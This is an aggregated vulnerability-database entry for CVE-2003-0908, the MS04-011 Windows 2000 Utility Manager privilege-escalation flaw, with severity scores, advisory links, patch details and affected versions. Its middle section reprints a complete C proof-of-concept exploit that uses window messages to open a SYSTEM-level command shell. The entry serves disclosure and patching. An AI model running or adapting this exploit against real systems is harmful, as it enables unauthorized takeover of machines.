CVE-2003-0908
CVSS 7.2
Published: 2004-06-01 00:00:00
Revised: 2008-09-10 15:20:54

[Original] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213.


[CNNVD] Microsoft Windows Utility Manager Privilege Escalation Vulnerability (MS04-011) (CNNVD-200406-015)

Microsoft Windows 2000 includes Utility Manager, which is used to manage the computer, performance services and the like.
Utility Manager has a privilege escalation flaw when it starts and runs applications; a locally logged-in user can exploit it to launch arbitrary applications with SYSTEM privileges and take control of the system.
No detailed vulnerability information is currently available.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1046 Windows Utility Manager Shatter Message Vulnerability
*OVAL describes in detail how to detect this vulnerability; more technical detail on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0908
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0908
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-015
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/526084
(VENDOR_ADVISORY)  CERT-VN  VU#526084
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
(VENDOR_ADVISORY)  CERT  TA04-104A
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
(VENDOR_ADVISORY)  MS  MS04-011
http://www.appsecinc.com/resources/alerts/general/04-0001.html
(VENDOR_ADVISORY)  MISC  http://www.appsecinc.com/resources/alerts/general/04-0001.html
http://archives.neohapsis.com/archives/vulnwatch/2004-q1/0082.html
(UNKNOWN)  VULNWATCH  20040414 [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability
http://xforce.iss.net/xforce/xfdb/15632
(UNKNOWN)  XF  win2k-utilitymgr-gain-privileges(15632)
http://www.securityfocus.com/bid/10124
(UNKNOWN)  BID  10124
http://www.securiteam.com/windowsntfocus/5LP0C2ACKU.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5LP0C2ACKU.html
http://www.ciac.org/ciac/bulletins/o-114.shtml
(UNKNOWN)  CIAC  O-114

- Vulnerability information

Microsoft Windows Utility Manager Privilege Escalation Vulnerability (MS04-011)
High severity; access validation error
2004-06-01 00:00:00 2005-10-31 00:00:00
Local

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Disable the Utility Manager service.
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS04-011) and the corresponding patch:
MS04-011: Security Update for Microsoft Windows (835732)
Link:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

Patch download:
Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, and Microsoft Windows 2000 Service Pack 4

http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

- Vulnerability information (271)

MS Windows Utility Manager Local SYSTEM Exploit (MS04-011) (EDBID:271)
windows local
2004-04-15 Verified
0 Cesar Cerrudo
N/A
// By Cesar Cerrudo cesar appsecinc com
// Local elevation of privileges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h> 
#include <windows.h> 
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[]) 
{ 
  HWND lHandle, lHandle2;
  POINT point;

  char sText[]="%windir%\\system32\\cmd.ex?";

  // run utility manager
  system("utilman.exe /start");
  Sleep(500);

  // execute contextual help
  SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
  Sleep(500);

  // open the File Open dialog window in Windows Help
  PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
  Sleep(500);

  // find open file dialog window
  lHandle = FindWindow("#32770","Open");

  // get input box handle
  lHandle2 = GetDlgItem(lHandle, 0x47C);
  Sleep(500);

  // set text to filter listview to display only cmd.exe
  SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
  Sleep(800);

  // send return
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

  //get navigation bar handle
  lHandle2 = GetDlgItem(lHandle, 0x4A0);
  //send tab
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
  Sleep(500);
  lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
  //get list view handle
  lHandle2 = GetDlgItem(lHandle2, 0x1);

  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
  Sleep(500);
  
  // popup context menu
  PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
  Sleep(1000);

  // get context menu handle
  point.x =10; point.y =30;
  lHandle2=WindowFromPoint(point);

  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

  SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

  return(0);
}




// milw0rm.com [2004-04-15]

- Vulnerability information

5254
Microsoft Windows Utility Manager Privilege Escalation
Local Access Required; Authentication Management
Loss of Integrity

- Vulnerability description

Windows contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when Utility Manager is launched, and does not release System privileges. An attacker may be able to cause Utility Manager to launch an application under System privileges, leading to a loss of integrity.

- Timeline

2004-04-13 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows Utility Manager Local Privilege Escalation Vulnerability
Access Validation Error, BID 10124
No Yes
2004-04-13 12:00:00 2007-10-02 06:09:00
Discovery of this vulnerability has been credited to Brett Moore, Cesar Cerrudo, and Ben Pryor.

- Affected program versions

Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers

- Vulnerability discussion

Microsoft Utility Manager is prone to a local privilege-escalation vulnerability that may allow a local attacker to execute arbitrary code with SYSTEM privileges.

- Exploit

A proof-of-concept exploit has been supplied:

- Solution

Microsoft has released a security bulletin and fixes to address this issue. Please see the references for more information.

Fixes are available for the following versions:

Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP4

- References
